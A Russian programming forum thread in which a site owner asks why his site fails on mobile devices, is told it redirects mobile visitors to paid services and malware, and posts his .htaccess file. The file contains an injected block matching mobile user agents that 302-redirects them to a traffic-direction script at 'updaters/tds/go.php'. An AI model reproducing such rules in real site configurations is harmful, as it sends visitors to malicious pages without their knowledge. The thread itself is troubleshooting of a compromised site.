Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > IT форум > Помощь студентам
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 19.01.2015, 19:12   #1
mihmihail
Пользователь
 
Регистрация: 23.01.2013
Сообщений: 32
По умолчанию Отображение сайта на мобильных устройствах

zaranoik.ru
Сайт вообще не отображается на мобильных устройствах и планшетах. В чем может быть проблема?
Заранее благодарен.
mihmihail вне форума Ответить с цитированием
Старый 20.01.2015, 07:44   #2
p51x
Старожил
 
Регистрация: 15.02.2010
Сообщений: 15,695
По умолчанию

а вы уберите попытки перенаправить их на платники и вирусы им залить и заработает
p51x вне форума Ответить с цитированием
Старый 20.01.2015, 21:50   #3
mihmihail
Пользователь
 
Регистрация: 23.01.2013
Сообщений: 32
По умолчанию

А как это сделать?
Вот содержимое htaccess. файла:
DirectoryIndex index.php
RewriteEngine On
RewriteCond %{HTTP_HOST} ^www.zaranoik.ru$ [NC]
RewriteRule ^(.*)$ http://zaranoik.ru/$1 [R=301,L]
# Редиректы
RewriteRule ^page/(.*)$ index.php?cstart=$1 [L]
# Сам пост
RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/page,([0-9]+),([0-9]+),(.*).html(/?)+$ index.php?subaction=showfull&year=$ 1&month=$2&day=$3&news_page=$4&csta rt=$5&news_name=$6 [L]
RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/page,([0-9]+),(.*).html(/?)+$ index.php?subaction=showfull&year=$ 1&month=$2&day=$3&news_page=$4&news _name=$5 [L]
RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/printage,([0-9]+),(.*).html(/?)+$ engine/print.php?subaction=showfull&year=$ 1&month=$2&day=$3&news_page=$4&news _name=$5 [L]
RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/(.*).html(/?)+$ index.php?subaction=showfull&year=$ 1&month=$2&day=$3&news_name=$4 [L]
RewriteRule ^([^.]+)/page,([0-9]+),([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$4&news_page=$2&cs tart=$3 [L]
RewriteRule ^([^.]+)/page,([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$3&news_page=$2 [L]
RewriteRule ^([^.]+)/printage,([0-9]+),([0-9]+)-(.*).html(/?)+$ engine/print.php?news_page=$2&newsid=$3 [L]
RewriteRule ^([^.]+)/([0-9]+)-(.*).html(/?)+$ index.php?newsid=$2 [L]
RewriteRule ^page,([0-9]+),([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$3&news_page=$1&cs tart=$2 [L]
RewriteRule ^page,([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$2&news_page=$1 [L]
RewriteRule ^printage,([0-9]+),([0-9]+)-(.*).html(/?)+$ engine/print.php?news_page=$1&newsid=$2 [L]
RewriteRule ^([0-9]+)-(.*).html(/?)+$ index.php?newsid=$1 [L]
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan| benq|bird|blac|blaz|brew|cell|cldc| cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java |jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi| mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc |port|prox|qtek|qwap|sage|sams|sany " [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|x da-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemo bile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|phone|pocket|mobi le|pda|psp|PPC|Android" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !iphone [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://updaters/tds/go.php?sid=1 [L,R=302]
# За день
RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})(/?)+$ index.php?year=$1&month=$2&day=$3 [L]
RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/page/([0-9]+)(/?)+$ index.php?year=$1&month=$2&day=$3&c start=$4 [L]
# За весь месяц
RewriteRule ^([0-9]{4})/([0-9]{2})(/?)+$ index.php?year=$1&month=$2 [L]
RewriteRule ^([0-9]{4})/([0-9]{2})/page/([0-9]+)(/?)+$ index.php?year=$1&month=$2&cstart=$ 3 [L]
# Вывод за весь год
RewriteRule ^([0-9]{4})(/?)+$ index.php?year=$1 [L]
RewriteRule ^([0-9]{4})/page/([0-9]+)(/?)+$ index.php?year=$1&cstart=$2 [L]
# вывод отдельному тегу
RewriteRule ^tags/([^/]*)(/?)+$ index.php?do=tags&tag=$1 [L]
RewriteRule ^tags/([^/]*)/page/([0-9]+)(/?)+$ index.php?do=tags&tag=$1&cstart=$2 [L]
# вывод для отдельного юзера
RewriteRule ^user/([^/]*)/rss.xml$ engine/rss.php?subaction=allnews&user=$1 [L]
RewriteRule ^user/([^/]*)(/?)+$ index.php?subaction=userinfo&user=$ 1 [L]
RewriteRule ^user/([^/]*)/page/([0-9]+)(/?)+$ index.php?subaction=userinfo&user=$ 1&cstart=$2 [L]
RewriteRule ^user/([^/]*)/news(/?)+$ index.php?subaction=allnews&user=$1 [L]
RewriteRule ^user/([^/]*)/news/page/([0-9]+)(/?)+$ index.php?subaction=allnews&user=$1 &cstart=$2 [L]
RewriteRule ^user/([^/]*)/news/rss.xml(/?)+$ engine/rss.php?subaction=allnews&user=$1 [L]
# вывод всех последних новостей
RewriteRule ^lastnews/(/?)+$ index.php?do=lastnews [L]
RewriteRule ^lastnews/page/([0-9]+)(/?)+$ index.php?do=lastnews&cstart=$1 [L]
# вывод в виде каталога
RewriteRule ^catalog/([^/]*)/rss.xml$ engine/rss.php?catalog=$1 [L]
RewriteRule ^catalog/([^/]*)(/?)+$ index.php?catalog=$1 [L]
RewriteRule ^catalog/([^/]*)/page/([0-9]+)(/?)+$ index.php?catalog=$1&cstart=$2 [L]

Что здесь является причиной некорректной работы сайта?
mihmihail вне форума Ответить с цитированием
Старый 21.01.2015, 22:32   #4
mihmihail
Пользователь
 
Регистрация: 23.01.2013
Сообщений: 32
По умолчанию

Вопрос закрыт - я разобрался.
mihmihail вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Для тех, кто сталкивается с JavaScript и HTML на мобильных устройствах MobiDev Мобильные ОС (Android, iOS, Windows Phone) 0 19.02.2014 14:23
Margin: 0 auto; не работает на мобильных устройствах Hrommi HTML и CSS 2 31.10.2013 13:57
разное отображение сайта kate158 HTML и CSS 15 20.01.2013 20:05
отображение сайта на мониторе Ципихович Эндрю Свободное общение 11 03.09.2012 20:14
Отображение меню сайта pavelslap HTML и CSS 6 30.12.2010 18:09